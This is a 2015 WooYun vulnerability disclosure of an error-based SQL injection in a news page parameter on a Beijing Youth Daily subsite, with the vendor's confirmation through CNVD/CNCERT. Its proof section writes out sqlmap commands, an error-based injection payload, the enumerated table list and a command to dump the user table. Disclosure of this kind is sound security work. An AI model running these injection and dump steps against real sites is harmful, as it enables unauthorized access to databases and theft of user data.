当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160471

漏洞标题:北青网某分站存在SQL注入漏洞

相关厂商:北青网

漏洞作者: Joker_C

提交时间:2015-12-17 01:14

修复时间:2016-01-28 15:25

公开时间:2016-01-28 15:25

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-17: 细节已通知厂商并且等待厂商处理中
2015-12-21: 厂商已经确认,细节仅向厂商公开
2015-12-31: 细节向核心白帽子及相关领域专家公开
2016-01-10: 细节向普通白帽子公开
2016-01-20: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

url中的参数没有过滤导致了注入问题

详细说明:

漏洞存在的url为 **.**.**.**/cgi/news.php?id=20
注入点为id 在最后加上'后 会出现报错回显 

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 select * from news where d_id=535955'

,因此可以用报错注入
sqlmap可快速地注出数据

漏洞证明:

sqlmap -u "http://**.**.**.**/cgi/news.php?id="--technique E --current-db
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=--technique AND (SELECT 1481 FROM(SELECT COUNT(*),CONCAT(0x7176787171,(SELECT (ELT(1481=1481,1))),0x716a6a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
[16:16:38] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
[16:16:38] [INFO] fetching current database
current database:    'web_2_1'


得到数据库名后继续获得表信息

sqlmap -u "http://**.**.**.**/cgi/news.php?id="--technique E --tables -D web_2_1
Database: web_2_1                                                              
[40 tables]
+-----------------+
| global          |
| user            |
| article_from    |
| auto_ad         |
| auto_bang       |
| auto_beauty     |
| auto_big_brands |
| auto_bqyc       |
| auto_brands     |
| auto_cars       |
| auto_comment    |
| auto_index      |
| auto_photo      |
| auto_subbrands  |
| auto_zhuanti    |
| baojia_4s       |
| beauty_album    |
| beauty_index    |
| blank_data      |
| complain        |
| dealers         |
| fenlei          |
| fenlei_beauty   |
| friend_links    |
| index_car2013   |
| market_cars     |
| navcode         |
| navigation      |
| news            |
| news_top        |
| polymorphic     |
| sp_t28          |
| sp_t32          |
| sp_t33          |
| sp_t34          |
| sp_t35          |
| sp_t36          |
| temp            |
| tempdef         |
| tuijian_top     |
+-----------------+


接着爆user表可获得用户信息

sqlmap -u "http://**.**.**.**/cgi/news.php?id="--technique E -T user  -D web_2_1 --dump


用户爆得太长了就不贴了

修复方案:

过滤 关闭错误回显

版权声明:转载请注明来源 Joker_C@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-21 18:46

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给北京分中心,由其后续协调网站管理单位处置.

最新状态:

暂无